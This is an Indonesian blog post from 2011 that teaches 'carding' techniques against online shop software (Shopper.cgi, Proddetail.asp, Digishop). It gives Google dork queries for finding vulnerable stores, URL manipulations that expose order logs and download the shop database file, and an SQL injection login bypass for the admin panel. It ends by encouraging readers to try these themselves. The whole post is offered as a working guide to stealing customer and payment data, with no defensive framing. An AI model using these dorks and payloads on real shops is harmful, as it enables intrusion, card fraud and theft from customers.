Teknik-teknik Carding

Posted: March 7, 2011 in Computer
Tags: , , , ,

Teknik Carding pada Sistem “Shopper.cgi”

contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :

google : Ketik –> allinurl: /cgi-local/shopper.cgi

Contoh : http://www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key= Tambah dengan –> …&template=order.log

Hasilnya : http://www.xxxxxxxx.com/cgilocal/shopper.cgi?preadd=action&key=…&template…

Teknik Carding pada Sistem “Proddetail.asp”

contoh bugs pada bentuk toko sistem : Proddetail.asp

contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :

Ketik –> allinurl:proddetail.asp?prod=

Contoh : http://www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle

Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb

Hasilnya : http://www.xxxxxx.org/fpdb/vsproducts.mdb

Teknik Carding pada Sistem “Digishop”

contoh bugs pada bentuk toko sistem : Digishop

contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :

google Ketik –> inurl:”/cart.php?m=”

Contoh : http://xxxxxxx.com/store/cart.php?m=view

Hapus tulisan cart.php?m=view dan ganti dengan –>admin

Hasilnya http://xxxxxx.com/store/admin

Inputkan username dan password’nya menggunakan statement SQL injection
Usename : ‘or”=”
Password : ‘or”=”

Silahkan berkreasi sendiri dan selamat mencoba

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s